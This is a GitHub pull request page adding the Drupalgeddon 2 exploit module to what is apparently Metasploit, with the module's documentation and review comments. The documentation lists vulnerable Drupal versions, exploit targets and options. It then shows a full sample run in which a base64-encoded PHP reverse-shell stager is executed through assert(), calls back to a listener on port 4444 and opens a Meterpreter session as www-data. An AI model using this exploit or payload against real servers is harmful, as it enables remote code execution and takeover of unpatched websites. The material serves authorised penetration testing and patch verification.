Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Drupal Drupalgeddon 2 #9876

Merged
merged 26 commits into from
Apr 25, 2018
Merged

Add Drupal Drupalgeddon 2 #9876

Show file tree
Hide file tree
Changes from 15 commits
Commits
Show all changes
26 commits
Select commit Hold shift + click to select a range
d8508b8
Add Drupal Drupalgeddon 2
wvu Apr 13, 2018
1900aa2
Refactor module and address review comments
wvu Apr 17, 2018
86ffbc7
Refactor clean URL handling and remove dead code
wvu Apr 18, 2018
3d116d7
Add version detection and automatic targeting
wvu Apr 19, 2018
7a2cc99
Refactor once more with feeling
wvu Apr 19, 2018
2670d06
Add in-memory PHP execution using assert()
wvu Apr 19, 2018
62aca93
Cache version detection and print only once
wvu Apr 19, 2018
fcfe927
Add PHP dropper functionality and targets
wvu Apr 19, 2018
5be4526
Merge remote-tracking branch 'upstream/master' into feature/drupal
wvu Apr 20, 2018
8be58d3
Stop being lazy about badchar analysis
wvu Apr 21, 2018
c8b6482
Rewrite PHP targets to work with 7.x and 8.x
wvu Apr 24, 2018
2abfee8
Add module doc to appease the @h00die god
wvu Apr 24, 2018
b507391
Change back to vprint_status for the nth time
wvu Apr 24, 2018
cd48616
Explain available targets in documentation
wvu Apr 24, 2018
cfaca5b
Restore a return lost in the refactor :(
wvu Apr 24, 2018
8ff4407
Clarify version detection error message
wvu Apr 25, 2018
89c95ca
Remove block quote and add version to sample run
wvu Apr 25, 2018
e03ebf9
Don't make a header out of tested version
wvu Apr 25, 2018
8bc1417
Use PHP_FUNC as a fallback in case assert() fails
wvu Apr 25, 2018
2ff0e59
Add SA-CORE-2018-002 as an AKA ref
wvu Apr 25, 2018
ec43801
Add check for patch level in CHANGELOG.txt
wvu Apr 25, 2018
b7ac160
Correct comment about PHP CLI (it's not our last!)
wvu Apr 25, 2018
910e933
Use print_good for patch level check, oops
wvu Apr 25, 2018
675ed78
Update module doc with patch level detection
wvu Apr 25, 2018
b8eb7f2
Set target type instead of regexing names
wvu Apr 25, 2018
644889a
Add TurnKey Linux ISOs to module doc setup section
wvu Apr 25, 2018
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
101 changes: 101 additions & 0 deletions documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
## Intro

> This module exploits a Drupal property injection in the Forms API.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

remove >

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

That was my smartass quoting the module description. :P

> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
> vulnerable.

## Setup

Use the provided Docker images here: <https://hub.docker.com/_/drupal/>.

Tested on the 7.57 and 8.4.5 tags (versions).

## Targets

```
Id Name
-- ----
0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)
```

Automatic targeting means the Drupal version will be detected first.
Targets with a specific version will do as they're told (regardless of
what the server is running).

Dropper targets write to disk. In-memory targets don't. Be mindful of
showing up in someone's process list, though. A dropper might be more
viable in that regard.

## Options

**TARGETURI**

Set this to the remote path of the vulnerable Drupal install. Defaults
to `/` for the web root.

**PHP_FUNC**

Set this to the PHP function you'd like to execute. Defaults to
`passthru`.

**DUMP_OUTPUT**

Enable this if you'd like to see HTTP responses, including command
output. Defaults to `false` unless `cmd/unix/generic` is your payload.

**VERBOSE**

Enable this to show what function and command were executed. Defaults to
`false` due to the sometimes excessive output.

**ForceExploit**

Enable this to force exploitation regardless of the check result.
Defaults to `false`, meaning the check result is respected.

**WritableDir**

Set this to a writable directory without `noexec` for binary payloads.
Defaults to the current working directory (usually the webapp root).

## Usage

```
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

can you add a h3 here with the exact drupal version thats being tested? Most likely ### Drupal 7.57 on docker image

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sure thing!

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I dropped the header, since it stuck out too proudly. I've written in the tested version instead. Thoughts?

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3
rhost => 172.17.0.3
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true
verbose => true
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check

[*] Drupal 7.x targeted at http://172.17.0.3/
[*] Executing with printf(): mGE9am2CAHbvmGg
[+] 172.17.0.3:80 The target is vulnerable.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Drupal 7.x targeted at http://172.17.0.3/
[*] Executing with printf(): HmsPV8tYlEbF
[*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
[*] Sending stage (37775 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:43864) at 2018-04-24 03:55:25 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : b3a405d5568a
OS : [redacted]
Meterpreter : php/linux
meterpreter >
```
Loading